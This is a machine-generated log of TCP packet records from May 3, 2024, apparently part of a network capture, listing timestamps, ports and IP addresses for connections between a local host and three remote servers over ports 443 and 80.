May 3, 2024 11:32:02.069257975 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.069268942 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:02.069283962 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.069312096 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.070497036 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:02.070540905 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:02.070565939 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.070573092 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:02.070590019 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.070610046 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.070610046 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.109834909 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:02.109889030 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:02.109940052 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.109940052 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.109973907 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:02.110146046 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.110224009 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.111032963 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:02.111085892 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:02.111114025 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.111121893 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:02.111143112 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.111159086 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.112533092 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:02.112582922 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:02.112610102 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.112616062 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:02.112629890 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.112654924 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.114094019 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:02.114136934 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:02.114154100 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.114162922 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:02.114177942 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.114208937 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.115863085 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:02.115905046 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:02.115930080 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.115936995 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:02.115951061 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.115979910 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.117527962 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:02.117569923 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:02.117589951 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.117595911 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:02.117611885 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.117630005 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.117692947 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.119263887 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:02.119312048 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:02.119330883 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.119338989 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:02.119353056 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.119378090 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.120508909 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:02.120552063 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:02.120577097 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.120584011 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:02.120598078 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.120631933 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.122273922 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:02.122317076 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:02.122337103 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.122344017 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:02.122358084 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.122385979 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.124130011 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:02.124180079 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:02.124197960 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.124205112 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:02.124214888 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.124222040 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.124241114 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.125611067 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:02.125653028 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:02.125675917 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.125682116 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:02.125694990 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.125720978 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.125797987 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.127348900 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:02.127392054 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:02.127412081 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.127418041 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:02.127429962 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.127438068 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.127456903 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.127507925 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.128545046 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:02.128599882 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:02.128612041 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.128619909 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:02.128638983 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.128659010 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.130223989 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:02.130273104 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:02.130295038 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.130301952 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:02.130315065 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.130336046 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.131973028 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:02.132015944 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:02.132044077 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.132051945 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:02.132064104 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.132091045 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.133771896 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:02.133816957 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:02.133833885 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.133841991 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:02.133852959 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.133879900 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.133919954 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.135443926 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:02.135488033 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:02.135510921 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.135515928 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:02.135526896 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.135549068 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.136666059 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:02.136713028 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:02.136733055 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.136739969 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:02.136759043 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.136787891 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.138432026 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:02.138479948 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:02.138492107 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.138499975 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:02.138528109 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.138545990 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.138581991 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.140090942 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:02.140141010 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:02.140166998 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.140172005 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:02.140186071 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.140208960 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.141774893 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:02.141822100 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:02.141844034 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.141850948 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:02.141865969 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.141885042 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.141923904 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.143542051 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:02.143582106 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:02.143603086 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.143609047 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:02.143621922 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.143640995 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.143687963 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.144762993 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:02.144805908 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:02.144819975 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.144828081 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:02.144841909 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.144869089 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.144903898 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.146414995 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:02.146464109 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:02.146476984 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.146485090 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:02.146497011 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.146511078 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.146532059 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.146564007 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.148225069 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:02.148267984 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:02.148282051 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.148296118 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:02.148312092 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.148332119 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.148361921 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.149280071 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:02.149323940 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:02.149337053 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.149344921 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:02.149370909 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.149388075 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.149415970 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.150774956 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:02.150844097 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:02.150844097 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.150856018 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:02.150890112 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.152538061 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:02.152578115 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:02.152601957 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.152607918 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:02.152621984 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.152638912 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.152643919 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:02.152677059 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.152682066 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:02.152689934 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.152715921 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.153122902 CEST	49163	443	192.168.2.22	172.67.175.222
May 3, 2024 11:32:02.153140068 CEST	443	49163	172.67.175.222	192.168.2.22
May 3, 2024 11:32:31.637425900 CEST	49164	80	192.168.2.22	91.195.240.19
May 3, 2024 11:32:31.813889980 CEST	80	49164	91.195.240.19	192.168.2.22
May 3, 2024 11:32:31.813960075 CEST	49164	80	192.168.2.22	91.195.240.19
May 3, 2024 11:32:31.814898968 CEST	49164	80	192.168.2.22	91.195.240.19
May 3, 2024 11:32:31.992171049 CEST	80	49164	91.195.240.19	192.168.2.22
May 3, 2024 11:32:31.992198944 CEST	80	49164	91.195.240.19	192.168.2.22
May 3, 2024 11:32:31.992357016 CEST	49164	80	192.168.2.22	91.195.240.19
May 3, 2024 11:32:31.992885113 CEST	49164	80	192.168.2.22	91.195.240.19
May 3, 2024 11:32:32.169250965 CEST	80	49164	91.195.240.19	192.168.2.22
May 3, 2024 11:32:38.692050934 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:38.817897081 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:38.817962885 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:38.821258068 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:38.946940899 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:38.947175026 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:38.947237015 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:38.947262049 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:38.947284937 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:38.947288036 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:38.947307110 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:38.947325945 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:38.947325945 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:38.947336912 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:38.947344065 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:38.947360992 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:38.947379112 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:38.947405100 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:38.947422981 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:38.947439909 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:38.947442055 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:38.947453022 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:38.947472095 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:38.947483063 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:38.947520018 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:38.969203949 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.072850943 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.072906017 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.072938919 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.072978973 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.073005915 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.073044062 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.073101997 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.073137045 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.073164940 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.073201895 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.073218107 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.073250055 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.073255062 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.073286057 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.073329926 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.073365927 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.073369980 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.073411942 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.073556900 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.073592901 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.073621988 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.073656082 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.073659897 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.073693037 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.073733091 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.073765039 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.073793888 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.073827982 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.073856115 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.073889017 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.073916912 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.073954105 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.074028015 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.074064016 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.074085951 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.074122906 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.074150085 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.074184895 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.074229002 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.074259043 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.075766087 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.198685884 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.198714018 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.198750973 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.198772907 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.198793888 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.198831081 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.198868990 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.198909044 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.198920965 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.198957920 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.198986053 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.199026108 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.199070930 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.199104071 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.199173927 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.199213028 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.199255943 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.199300051 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.199378014 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.199419975 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.199436903 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.199474096 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.199517965 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.199554920 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.199616909 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.199656010 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.199698925 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.199738979 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.199784040 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.199824095 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.199862957 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.199902058 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.199922085 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.199960947 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.200004101 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.200045109 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.200134993 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.200176954 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.200206995 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.200248957 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.200278044 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.200316906 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.200344086 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.200377941 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.200385094 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.200421095 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.200469971 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.200510025 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.200511932 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.200550079 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.200581074 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.200612068 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.200618982 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.200649977 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.200678110 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.200716019 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.200737953 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.200756073 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.200774908 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.200787067 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.200824976 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.200862885 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.200936079 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.200974941 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.201004028 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.201042891 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.201071024 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.201113939 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.201134920 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.201174974 CEST	49165	80	192.168.2.22	45.33.6.223
May 3, 2024 11:32:39.201194048 CEST	80	49165	45.33.6.223	192.168.2.22
May 3, 2024 11:32:39.201231003 CEST	49165	80	192.168.2.22	45.33.6.223
